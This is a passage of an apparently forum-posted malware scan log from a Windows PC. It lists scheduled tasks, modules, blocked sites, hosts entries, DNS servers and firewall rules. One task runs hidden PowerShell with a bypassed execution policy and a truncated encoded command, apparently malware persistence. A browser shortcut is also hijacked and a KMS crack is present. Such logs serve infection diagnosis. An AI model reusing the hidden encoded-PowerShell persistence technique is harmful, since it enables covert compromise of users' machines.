    Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
    Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
    Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
    Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {EC2D2A3E-E44B-44C6-8E6E-EA7A037E1BFF} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
    Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - System32\Tasks\{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9436 more characters).
    Task: {F3AF02E3-81A9-485B-B1B6-519881BEBF51} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
    Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)
    Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157

    ==================== Loaded Modules (Whitelisted) ==============

    2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
    2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
    2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
    2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
    2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
    2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
    2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
    2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
    2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
    2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
    2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
    2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
    2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
    2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
    2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
    2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
    2016-02-29 19:32 - 2016-02-29 19:32 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022900\algo.dll
    2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
    2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
    2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
    2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
    2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
    IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
    IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
    IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
    IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
    IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
    IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
    IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
    IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
    IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
    IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
    IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
    IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
    IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
    IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
    IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
    IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
    IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
    IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
    IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

    There are 7870 more sites.

    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\007guard.com -> install.007guard.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008i.com -> 008i.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008k.com -> www.008k.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\00hq.com -> www.00hq.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\010402.com -> 010402.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\0scan.com -> www.0scan.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-2005-search.com -> www.1-2005-search.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1000gratisproben.com -> www.1000gratisproben.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1001namen.com -> www.1001namen.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100888290cs.com -> mir.100888290cs.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100sexlinks.com -> www.100sexlinks.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\10sek.com -> www.10sek.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-26.net -> user1.12-26.net
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-27.net -> user1.12-27.net
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123fporn.info -> www.123fporn.info
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123moviedownload.com -> www.123moviedownload.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123simsen.com -> www.123simsen.com

    There are 7870 more sites.


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts

    127.0.0.1 www.007guard.com
    127.0.0.1 007guard.com
    127.0.0.1 008i.com
    127.0.0.1 www.008k.com
    127.0.0.1 008k.com
    127.0.0.1 www.00hq.com
    127.0.0.1 00hq.com
    127.0.0.1 010402.com
    127.0.0.1 www.032439.com
    127.0.0.1 032439.com
    127.0.0.1 www.0scan.com
    127.0.0.1 0scan.com
    127.0.0.1 1000gratisproben.com
    127.0.0.1 www.1000gratisproben.com
    127.0.0.1 1001namen.com
    127.0.0.1 www.1001namen.com
    127.0.0.1 100888290cs.com
    127.0.0.1 www.100888290cs.com
    127.0.0.1 www.100sexlinks.com
    127.0.0.1 100sexlinks.com
    127.0.0.1 10sek.com
    127.0.0.1 www.10sek.com
    127.0.0.1 www.1-2005-search.com
    127.0.0.1 1-2005-search.com
    127.0.0.1 123fporn.info
    127.0.0.1 www.123fporn.info
    127.0.0.1 123haustiereundmehr.com
    127.0.0.1 www.123haustiereundmehr.com
    127.0.0.1 123moviedownload.com
    127.0.0.1 www.123moviedownload.com

    There are 15468 more lines.


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
    DNS Servers: 82.163.143.171 - 82.163.142.173
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
    FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
    FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
    FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
    FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
    FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
